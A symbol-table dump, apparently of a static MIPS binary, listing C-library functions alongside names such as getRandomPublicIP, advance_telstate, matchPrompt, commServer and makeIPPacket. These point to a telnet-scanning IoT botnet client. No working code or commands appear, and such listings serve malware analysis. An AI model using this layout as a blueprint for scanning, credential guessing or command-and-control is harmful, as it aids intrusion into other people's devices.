__libc_send	.symtab	0x40a570	92	FUNC	<unknown>	DEFAULT	3
__libc_sendto	.symtab	0x40a654	32	FUNC	<unknown>	DEFAULT	3
__libc_sigaction	.symtab	0x40d630	28	FUNC	<unknown>	DEFAULT	3
__libc_stack_end	.symtab	0x45f120	4	OBJECT	<unknown>	DEFAULT	14
__libc_system	.symtab	0x40d360	568	FUNC	<unknown>	DEFAULT	3
__libc_waitpid	.symtab	0x4077d0	28	FUNC	<unknown>	DEFAULT	3
__libc_write	.symtab	0x407b80	88	FUNC	<unknown>	DEFAULT	3
__local_nameserver	.symtab	0x418370	16	OBJECT	<unknown>	HIDDEN	5
__malloc_consolidate	.symtab	0x40b574	520	FUNC	<unknown>	HIDDEN	3
__malloc_largebin_index	.symtab	0x40a8e0	140	FUNC	<unknown>	DEFAULT	3
__malloc_lock	.symtab	0x458820	24	OBJECT	<unknown>	DEFAULT	10
__malloc_state	.symtab	0x45f1f0	888	OBJECT	<unknown>	DEFAULT	14
__malloc_trim	.symtab	0x40b450	292	FUNC	<unknown>	DEFAULT	3
__nameserver	.symtab	0x458ea0	4	OBJECT	<unknown>	HIDDEN	13
__nameservers	.symtab	0x458ea4	4	OBJECT	<unknown>	HIDDEN	13
__open_etc_hosts	.symtab	0x414de0	32	FUNC	<unknown>	HIDDEN	3
__open_nameservers	.symtab	0x413cb0	1636	FUNC	<unknown>	HIDDEN	3
__pagesize	.symtab	0x45f128	4	OBJECT	<unknown>	DEFAULT	14
__preinit_array_end	.symtab	0x458394	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__preinit_array_start	.symtab	0x458394	0	NOTYPE	<unknown>	HIDDEN	SHN_ABS
__progname	.symtab	0x458944	4	OBJECT	<unknown>	DEFAULT	10
__progname_full	.symtab	0x458948	4	OBJECT	<unknown>	DEFAULT	10
__pthread_initialize_minimal	.symtab	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
__pthread_mutex_init	.symtab	0x40cd88	8	FUNC	<unknown>	DEFAULT	3
__pthread_mutex_lock	.symtab	0x40cd80	8	FUNC	<unknown>	DEFAULT	3
__pthread_mutex_trylock	.symtab	0x40cd80	8	FUNC	<unknown>	DEFAULT	3
__pthread_mutex_unlock	.symtab	0x40cd80	8	FUNC	<unknown>	DEFAULT	3
__pthread_return_0	.symtab	0x40cd80	8	FUNC	<unknown>	DEFAULT	3
__read_etc_hosts_r	.symtab	0x414e00	712	FUNC	<unknown>	HIDDEN	3
__register_frame_info	.symtab	0x0	0	FUNC	<unknown>	DEFAULT	SHN_UNDEF
__res_sync	.symtab	0x458e98	4	OBJECT	<unknown>	HIDDEN	13
__resolv_attempts	.symtab	0x458971	1	OBJECT	<unknown>	HIDDEN	10
__resolv_lock	.symtab	0x45f170	24	OBJECT	<unknown>	DEFAULT	14
__resolv_timeout	.symtab	0x458970	1	OBJECT	<unknown>	HIDDEN	10
__rtld_fini	.symtab	0x45f130	4	OBJECT	<unknown>	HIDDEN	14
__searchdomain	.symtab	0x458e9c	4	OBJECT	<unknown>	HIDDEN	13
__searchdomains	.symtab	0x458ea8	4	OBJECT	<unknown>	HIDDEN	13
__sigaddset	.symtab	0x40a878	44	FUNC	<unknown>	DEFAULT	3
__sigdelset	.symtab	0x40a8a4	48	FUNC	<unknown>	DEFAULT	3
__sigismember	.symtab	0x40a850	40	FUNC	<unknown>	DEFAULT	3
__start	.symtab	0x4002b0	100	FUNC	<unknown>	DEFAULT	3
__stdin	.symtab	0x45870c	4	OBJECT	<unknown>	DEFAULT	10
__stdio_READ	.symtab	0x4123b0	144	FUNC	<unknown>	HIDDEN	3
__stdio_WRITE	.symtab	0x40e960	296	FUNC	<unknown>	HIDDEN	3
__stdio_adjust_position	.symtab	0x412440	292	FUNC	<unknown>	HIDDEN	3
__stdio_fwrite	.symtab	0x40ee20	472	FUNC	<unknown>	HIDDEN	3
__stdio_init_mutex	.symtab	0x407f9c	32	FUNC	<unknown>	HIDDEN	3
__stdio_mutex_initializer.4474	.symtab	0x416dc0	24	OBJECT	<unknown>	DEFAULT	5
__stdio_rfill	.symtab	0x412570	88	FUNC	<unknown>	HIDDEN	3
__stdio_seek	.symtab	0x4126c0	112	FUNC	<unknown>	HIDDEN	3
__stdio_trans2r_o	.symtab	0x4125d0	228	FUNC	<unknown>	HIDDEN	3
__stdio_trans2w_o	.symtab	0x40f000	312	FUNC	<unknown>	HIDDEN	3
__stdio_wcommit	.symtab	0x4080f0	100	FUNC	<unknown>	HIDDEN	3
__stdout	.symtab	0x458710	4	OBJECT	<unknown>	DEFAULT	10
__sys_sendto	.symtab	0x40a5d0	132	FUNC	<unknown>	DEFAULT	3
__syscall_fcntl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_rt_sigaction	.symtab	0x40d9b0	88	FUNC	<unknown>	DEFAULT	3
__syscall_rt_sigaction.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_select	.symtab	0x4078b0	124	FUNC	<unknown>	DEFAULT	3
__uClibc_fini	.symtab	0x40cdc0	204	FUNC	<unknown>	DEFAULT	3
__uClibc_init	.symtab	0x40cf14	140	FUNC	<unknown>	DEFAULT	3
__uClibc_main	.symtab	0x40cfa0	948	FUNC	<unknown>	DEFAULT	3
__uClibc_main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__uclibc_progname	.symtab	0x458940	4	OBJECT	<unknown>	HIDDEN	10
__xpg_strerror_r	.symtab	0x409f20	388	FUNC	<unknown>	DEFAULT	3
__xpg_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__xstat32_conv	.symtab	0x411dc8	220	FUNC	<unknown>	HIDDEN	3
__xstat64_conv	.symtab	0x411cd0	248	FUNC	<unknown>	HIDDEN	3
__xstat_conv	.symtab	0x411ea4	220	FUNC	<unknown>	HIDDEN	3
_adjust_pos.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_bss_custom_printf_spec	.symtab	0x45ef00	10	OBJECT	<unknown>	DEFAULT	14
_charpad	.symtab	0x408160	156	FUNC	<unknown>	DEFAULT	3
_cs_funcs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_custom_printf_arginfo	.symtab	0x45f190	40	OBJECT	<unknown>	HIDDEN	14
_custom_printf_handler	.symtab	0x45f1b8	40	OBJECT	<unknown>	HIDDEN	14
_custom_printf_spec	.symtab	0x458810	4	OBJECT	<unknown>	HIDDEN	10
_dl_aux_init	.symtab	0x411ae0	40	FUNC	<unknown>	DEFAULT	3
_dl_phdr	.symtab	0x458e90	4	OBJECT	<unknown>	DEFAULT	13
_dl_phnum	.symtab	0x458e94	4	OBJECT	<unknown>	DEFAULT	13
_edata	.symtab	0x458e84	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_end	.symtab	0x45f568	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_errno	.symtab	0x45f140	4	OBJECT	<unknown>	DEFAULT	14
_exit	.symtab	0x407be0	92	FUNC	<unknown>	DEFAULT	3
_exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fbss	.symtab	0x458e84	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_fdata	.symtab	0x4583b0	0	NOTYPE	<unknown>	DEFAULT	10
_fini	.symtab	0x415350	28	FUNC	<unknown>	DEFAULT	4
_fixed_buffers	.symtab	0x45cef8	8192	OBJECT	<unknown>	DEFAULT	14
_fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fp_out_narrow	.symtab	0x4081fc	232	FUNC	<unknown>	DEFAULT	3
_fpmaxtostr	.symtab	0x40f370	2252	FUNC	<unknown>	HIDDEN	3
_fpmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ftext	.symtab	0x400160	0	NOTYPE	<unknown>	DEFAULT	3
_fwrite.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_gp	.symtab	0x460970	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_gp_disp	.symtab	0x0	0	OBJECT	<unknown>	DEFAULT	SHN_UNDEF
_h_errno	.symtab	0x45f144	4	OBJECT	<unknown>	DEFAULT	14
_init	.symtab	0x4000cc	28	FUNC	<unknown>	DEFAULT	2
_load_inttype	.symtab	0x40f140	132	FUNC	<unknown>	HIDDEN	3
_load_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_init	.symtab	0x408bb0	248	FUNC	<unknown>	HIDDEN	3
_ppfs_init.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_parsespec	.symtab	0x408fbc	1684	FUNC	<unknown>	HIDDEN	3
_ppfs_parsespec.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_prepargs	.symtab	0x408cb0	100	FUNC	<unknown>	HIDDEN	3
_ppfs_prepargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_setargs	.symtab	0x408d20	548	FUNC	<unknown>	HIDDEN	3
_ppfs_setargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_promoted_size	.symtab	0x408f50	108	FUNC	<unknown>	DEFAULT	3
_pthread_cleanup_pop_restore	.symtab	0x40cd9c	36	FUNC	<unknown>	DEFAULT	3
_pthread_cleanup_push_defer	.symtab	0x40cd90	12	FUNC	<unknown>	DEFAULT	3
_rfill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_sigintr	.symtab	0x45f1e0	16	OBJECT	<unknown>	HIDDEN	14
_stdio.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_stdio_fopen	.symtab	0x40ea90	908	FUNC	<unknown>	HIDDEN	3
_stdio_init	.symtab	0x407ee0	188	FUNC	<unknown>	HIDDEN	3
_stdio_openlist	.symtab	0x458714	4	OBJECT	<unknown>	DEFAULT	10
_stdio_openlist_add_lock	.symtab	0x4586c0	24	OBJECT	<unknown>	DEFAULT	10
_stdio_openlist_dec_use	.symtab	0x40fe30	412	FUNC	<unknown>	HIDDEN	3
_stdio_openlist_del_count	.symtab	0x45cef4	4	OBJECT	<unknown>	DEFAULT	14
_stdio_openlist_del_lock	.symtab	0x4586d8	24	OBJECT	<unknown>	DEFAULT	10
_stdio_openlist_use_count	.symtab	0x45cef0	4	OBJECT	<unknown>	DEFAULT	14
_stdio_streams	.symtab	0x458718	240	OBJECT	<unknown>	DEFAULT	10
_stdio_term	.symtab	0x407fbc	304	FUNC	<unknown>	HIDDEN	3
_stdio_user_locking	.symtab	0x4586f0	4	OBJECT	<unknown>	DEFAULT	10
_stdlib_strto_l	.symtab	0x40c420	600	FUNC	<unknown>	HIDDEN	3
_stdlib_strto_l.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_store_inttype	.symtab	0x40f1d0	68	FUNC	<unknown>	HIDDEN	3
_store_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_string_syserrmsgs	.symtab	0x416f30	2934	OBJECT	<unknown>	HIDDEN	5
_string_syserrmsgs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2w.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_uintmaxtostr	.symtab	0x40f220	332	FUNC	<unknown>	HIDDEN	3
_uintmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_vfprintf_internal	.symtab	0x4082e4	2240	FUNC	<unknown>	HIDDEN	3
_vfprintf_internal.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_wcommit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
abort	.symtab	0x40ba70	408	FUNC	<unknown>	DEFAULT	3
abort.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
access	.symtab	0x407850	88	FUNC	<unknown>	DEFAULT	3
access.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
advance_telstate	.symtab	0x400b54	204	FUNC	<unknown>	DEFAULT	3
advances	.symtab	0x4585f0	52	OBJECT	<unknown>	DEFAULT	10
advances2	.symtab	0x458674	44	OBJECT	<unknown>	DEFAULT	10
atoi	.symtab	0x40c3e0	28	FUNC	<unknown>	DEFAULT	3
atol	.symtab	0x40c3e0	28	FUNC	<unknown>	DEFAULT	3
atol.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
bcopy	.symtab	0x409ee0	32	FUNC	<unknown>	DEFAULT	3
bcopy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
been_there_done_that	.symtab	0x45f100	4	OBJECT	<unknown>	DEFAULT	14
brk	.symtab	0x411b10	112	FUNC	<unknown>	DEFAULT	3
brk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
bsd_signal	.symtab	0x40a760	236	FUNC	<unknown>	DEFAULT	3
buf.2909	.symtab	0x45ef20	16	OBJECT	<unknown>	DEFAULT	14
buf.5324	.symtab	0x45ef30	440	OBJECT	<unknown>	DEFAULT	14
bzero	.symtab	0x40a0b0	28	FUNC	<unknown>	DEFAULT	3
bzero.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
c	.symtab	0x4583d4	4	OBJECT	<unknown>	DEFAULT	10
calloc	.symtab	0x411420	348	FUNC	<unknown>	DEFAULT	3
calloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
chdir	.symtab	0x407950	92	FUNC	<unknown>	DEFAULT	3
chdir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
cli.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
clock_getres	.symtab	0x40d6f0	88	FUNC	<unknown>	DEFAULT	3
clock_getres.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
close	.symtab	0x407ca0	88	FUNC	<unknown>	DEFAULT	3
close.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
closedir	.symtab	0x40da70	308	FUNC	<unknown>	DEFAULT	3
closedir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
closenameservers.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
commServer	.symtab	0x458470	4	OBJECT	<unknown>	DEFAULT	10
completed.4632	.symtab	0x458eb0	1	OBJECT	<unknown>	DEFAULT	14
connect	.symtab	0x40a430	92	FUNC	<unknown>	DEFAULT	3
connect.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
connectTimeout	.symtab	0x4023ac	828	FUNC	<unknown>	DEFAULT	3
contains_fail	.symtab	0x4007c8	88	FUNC	<unknown>	DEFAULT	3
contains_response	.symtab	0x400820	148	FUNC	<unknown>	DEFAULT	3
contains_string	.symtab	0x400658	280	FUNC	<unknown>	DEFAULT	3
contains_success	.symtab	0x400770	88	FUNC	<unknown>	DEFAULT	3
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
csum	.symtab	0x403644	460	FUNC	<unknown>	DEFAULT	3
currentServer	.symtab	0x4583d0	4	OBJECT	<unknown>	DEFAULT	10
data_start	.symtab	0x4583c0	0	OBJECT	<unknown>	DEFAULT	10
decoded.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
decodeh.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dl-support.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dnslookup.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encoded.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encodeh.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
encodeq.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
environ	.symtab	0x45f124	4	OBJECT	<unknown>	DEFAULT	14
errno	.symtab	0x45f140	4	OBJECT	<unknown>	DEFAULT	14
errno.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
estridx	.symtab	0x416ea0	126	OBJECT	<unknown>	DEFAULT	5
execl	.symtab	0x411a10	196	FUNC	<unknown>	DEFAULT	3
execl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
execve	.symtab	0x411b80	88	FUNC	<unknown>	DEFAULT	3
execve.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exit	.symtab	0x40c680	236	FUNC	<unknown>	DEFAULT	3
exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exp10_table	.symtab	0x418258	72	OBJECT	<unknown>	DEFAULT	5
fails	.symtab	0x458624	32	OBJECT	<unknown>	DEFAULT	10
fclose	.symtab	0x40e740	512	FUNC	<unknown>	DEFAULT	3
fclose.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fcntl	.symtab	0x407a70	136	FUNC	<unknown>	DEFAULT	3
fd_to_DIR	.symtab	0x40dbb0	276	FUNC	<unknown>	DEFAULT	3
fdopendir	.symtab	0x40ddc8	248	FUNC	<unknown>	DEFAULT	3
fflush_unlocked	.symtab	0x40ffcc	648	FUNC	<unknown>	DEFAULT	3
fflush_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc	.symtab	0x40fc40	264	FUNC	<unknown>	DEFAULT	3
fgetc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc_unlocked	.symtab	0x410260	388	FUNC	<unknown>	DEFAULT	3
fgetc_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets	.symtab	0x40fd50	212	FUNC	<unknown>	DEFAULT	3
fgets.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets_unlocked	.symtab	0x4103f0	276	FUNC	<unknown>	DEFAULT	3
fgets_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fmt	.symtab	0x418240	20	OBJECT	<unknown>	DEFAULT	5
fopen	.symtab	0x40e940	28	FUNC	<unknown>	DEFAULT	3
fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fork	.symtab	0x407770	88	FUNC	<unknown>	DEFAULT	3
fork.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fputs_unlocked	.symtab	0x409650	124	FUNC	<unknown>	DEFAULT	3
fputs_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
frame_dummy	.symtab	0x40021c	0	FUNC	<unknown>	DEFAULT	3
free	.symtab	0x40b77c	660	FUNC	<unknown>	DEFAULT	3
free.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseek	.symtab	0x4121d0	68	FUNC	<unknown>	DEFAULT	3
fseeko	.symtab	0x4121d0	68	FUNC	<unknown>	DEFAULT	3
fseeko.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseeko64	.symtab	0x412220	392	FUNC	<unknown>	DEFAULT	3
fseeko64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fstat	.symtab	0x411c40	144	FUNC	<unknown>	DEFAULT	3
fstat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fwrite_unlocked	.symtab	0x4096d0	268	FUNC	<unknown>	DEFAULT	3
fwrite_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getBuild	.symtab	0x400320	56	FUNC	<unknown>	DEFAULT	3
getEndianness	.symtab	0x4065f4	340	FUNC	<unknown>	DEFAULT	3
getHost	.symtab	0x401e94	160	FUNC	<unknown>	DEFAULT	3
getRandomIP	.symtab	0x403598	172	FUNC	<unknown>	DEFAULT	3
getRandomPublicIP	.symtab	0x402dd4	1988	FUNC	<unknown>	DEFAULT	3
get_hosts_byname_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
get_telstate_host	.symtab	0x400aec	104	FUNC	<unknown>	DEFAULT	3
getc	.symtab	0x40fc40	264	FUNC	<unknown>	DEFAULT	3
getc_unlocked	.symtab	0x410260	388	FUNC	<unknown>	DEFAULT	3
getdents64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getdtablesize	.symtab	0x40d830	72	FUNC	<unknown>	DEFAULT	3
getdtablesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getegid	.symtab	0x40d750	16	FUNC	<unknown>	DEFAULT	3
getegid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
geteuid	.symtab	0x40d760	16	FUNC	<unknown>	DEFAULT	3
geteuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getgid	.symtab	0x40d820	16	FUNC	<unknown>	DEFAULT	3
getgid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname	.symtab	0x40a380	28	FUNC	<unknown>	DEFAULT	3
gethostbyname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname2	.symtab	0x40a3a0	132	FUNC	<unknown>	DEFAULT	3
gethostbyname2.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname2_r	.symtab	0x411010	948	FUNC	<unknown>	DEFAULT	3
gethostbyname2_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostbyname_r	.symtab	0x414470	940	FUNC	<unknown>	DEFAULT	3
gethostbyname_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gethostname	.symtab	0x414880	204	FUNC	<unknown>	DEFAULT	3
gethostname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpagesize	.symtab	0x40d6b0	48	FUNC	<unknown>	DEFAULT	3
getpagesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpid	.symtab	0x407640	16	FUNC	<unknown>	DEFAULT	3
getpid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getrlimit	.symtab	0x411be0	88	FUNC	<unknown>	DEFAULT	3
getrlimit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getsockopt	.symtab	0x40a490	124	FUNC	<unknown>	DEFAULT	3
getsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getuid	.symtab	0x40d6e0	16	FUNC	<unknown>	DEFAULT	3
getuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
h_errno	.symtab	0x45f144	4	OBJECT	<unknown>	DEFAULT	14
hlt	.symtab	0x40030c	0	NOTYPE	<unknown>	DEFAULT	3
hoste.5323	.symtab	0x45f0e8	20	OBJECT	<unknown>	DEFAULT	14
htonl	.symtab	0x40a250	8	FUNC	<unknown>	DEFAULT	3
htons	.symtab	0x40a258	8	FUNC	<unknown>	DEFAULT	3
i.4743	.symtab	0x4583d8	4	OBJECT	<unknown>	DEFAULT	10
index	.symtab	0x409d90	248	FUNC	<unknown>	DEFAULT	3
inet_addr	.symtab	0x40a330	72	FUNC	<unknown>	DEFAULT	3
inet_aton	.symtab	0x410f10	244	FUNC	<unknown>	DEFAULT	3
inet_aton.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_makeaddr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_ntoa	.symtab	0x40a30c	32	FUNC	<unknown>	DEFAULT	3
inet_ntoa.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_ntoa_r	.symtab	0x40a260	172	FUNC	<unknown>	DEFAULT	3
inet_ntop	.symtab	0x412ca0	868	FUNC	<unknown>	DEFAULT	3
inet_ntop4	.symtab	0x412ad8	456	FUNC	<unknown>	DEFAULT	3
inet_pton	.symtab	0x412818	704	FUNC	<unknown>	DEFAULT	3
inet_pton4	.symtab	0x412730	232	FUNC	<unknown>	DEFAULT	3
initConnection	.symtab	0x4061d8	592	FUNC	<unknown>	DEFAULT	3
init_rand	.symtab	0x400358	300	FUNC	<unknown>	DEFAULT	3
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
initstate	.symtab	0x40bd8c	208	FUNC	<unknown>	DEFAULT	3
initstate_r	.symtab	0x40c290	328	FUNC	<unknown>	DEFAULT	3
ioctl	.symtab	0x40d940	108	FUNC	<unknown>	DEFAULT	3
ioctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
ipState.5512	.symtab	0x458ee8	4	OBJECT	<unknown>	DEFAULT	14
isatty	.symtab	0x40a150	60	FUNC	<unknown>	DEFAULT	3
isatty.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
isspace	.symtab	0x407d00	44	FUNC	<unknown>	DEFAULT	3
isspace.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
kill	.symtab	0x407a10	92	FUNC	<unknown>	DEFAULT	3
kill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
last_id.5381	.symtab	0x458960	2	OBJECT	<unknown>	DEFAULT	10
last_ns_num.5380	.symtab	0x45f160	4	OBJECT	<unknown>	DEFAULT	14
libc/string/mips/memcpy.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/mips/memset.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/mips/crt1.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/mips/crti.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/mips/crtn.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
listFork	.symtab	0x4026e8	668	FUNC	<unknown>	DEFAULT	3
llseek.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
lseek64	.symtab	0x4149e0	168	FUNC	<unknown>	DEFAULT	3
macAddress	.symtab	0x458ee0	6	OBJECT	<unknown>	DEFAULT	14
main	.symtab	0x406748	3468	FUNC	<unknown>	DEFAULT	3
mainCommSock	.symtab	0x458ed0	4	OBJECT	<unknown>	DEFAULT	14
makeIPPacket	.symtab	0x40396c	312	FUNC	<unknown>	DEFAULT	3
makeRandomStr	.symtab	0x401f34	268	FUNC	<unknown>	DEFAULT	3
malloc	.symtab	0x40a96c	2776	FUNC	<unknown>	DEFAULT	3
malloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
malloc_trim	.symtab	0x40ba10	84	FUNC	<unknown>	DEFAULT	3
matchPrompt	.symtab	0x402bbc	536	FUNC	<unknown>	DEFAULT	3
memchr	.symtab	0x410510	260	FUNC	<unknown>	DEFAULT	3
memchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memcpy	.symtab	0x409870	308	FUNC	<unknown>	DEFAULT	3
memmove	.symtab	0x410620	824	FUNC	<unknown>	DEFAULT	3
memmove.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mempcpy	.symtab	0x410d80	76	FUNC	<unknown>	DEFAULT	3
mempcpy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memrchr	.symtab	0x410b80	260	FUNC	<unknown>	DEFAULT	3
memrchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memset	.symtab	0x4097e0	144	FUNC	<unknown>	DEFAULT	3
mmap	.symtab	0x40d5a0	132	FUNC	<unknown>	DEFAULT	3
mmap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mremap	.symtab	0x411f80	124	FUNC	<unknown>	DEFAULT	3
mremap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
munmap	.symtab	0x40d880	88	FUNC	<unknown>	DEFAULT	3
munmap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mylock	.symtab	0x458840	24	OBJECT	<unknown>	DEFAULT	10
mylock	.symtab	0x458860	24	OBJECT	<unknown>	DEFAULT	10
nanosleep	.symtab	0x40d8e0	92	FUNC	<unknown>	DEFAULT	3
nanosleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
negotiate	.symtab	0x402984	568	FUNC	<unknown>	DEFAULT	3
next_start.1303	.symtab	0x45ef10	4	OBJECT	<unknown>	DEFAULT	14
nprocessors_onln	.symtab	0x40c890	508	FUNC	<unknown>	DEFAULT	3
ntohl	.symtab	0x40a240	8	FUNC	<unknown>	DEFAULT	3
ntohl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
ntohs	.symtab	0x40a248	8	FUNC	<unknown>	DEFAULT	3
ntop.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
numpids	.symtab	0x458ed8	8	OBJECT	<unknown>	DEFAULT	14
object.4644	.symtab	0x458eb4	24	OBJECT	<unknown>	DEFAULT	14
open	.symtab	0x4075c0	124	FUNC	<unknown>	DEFAULT	3
